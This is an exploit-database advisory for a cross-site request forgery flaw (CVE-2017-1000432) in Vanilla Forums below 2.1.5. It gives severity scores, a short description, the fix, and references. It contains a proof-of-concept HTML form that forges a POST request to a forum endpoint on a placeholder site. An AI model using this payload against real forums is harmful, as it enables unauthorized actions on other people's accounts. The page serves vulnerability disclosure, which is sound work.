Vanilla < 2.1.5 Cross-Site Request Forgery

2018.01.08
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: CSRF vulnerabilities in Vanilla Forums below 2.1.5-CVE-2017-1000432 # Google Dork: NA # Date: 7/1/2018 # Contact: https://twitter.com/anandm47 # website: https://anandtechzone.blogspot.in <https://t.co/MJ8SoRaIMn> # Exploit Author: Anand Meyyappan # Vendor Homepage: https://open.vanillaforums.com <https://open.vanillaforums.com/discussion/28337/vanilla-2-1-5-released-and-2-0-18-14> # Software Link: https://open.vanillaforums.com/addon/vanilla-core-2.1 # Tested on: Windows, Linux # CVE : CVE-2017-1000432 Description Any registered user can delete topics and comments in forum without having admin access. 2.Proof Of Concept Save the below code in html format, Once victim is logged into account. Use the below code. <form method="post" action="https://www.site.com/forum/vanilla/discussion/dismissannouncement?discussionid=3709"> <input name=" DeliveryType" value="VIEW" class="input" type="hidden"> <input name=" DeliveryMethod" value="JSON" class="input" type="hidden"> <li> <label><br></label><input value="Send" class="submit" type="submit"></li> </ul> </form> 3. Solution: Update to version 2.5 https://open.vanillaforums.com/get/vanilla-core-2.5 #Reference https://open.vanillaforums.com/discussion/28337/vanilla-2-1-5-released-and-2-0-18-14 https://www.cvedetails.com/cve/CVE-2017-1000432/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000432


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top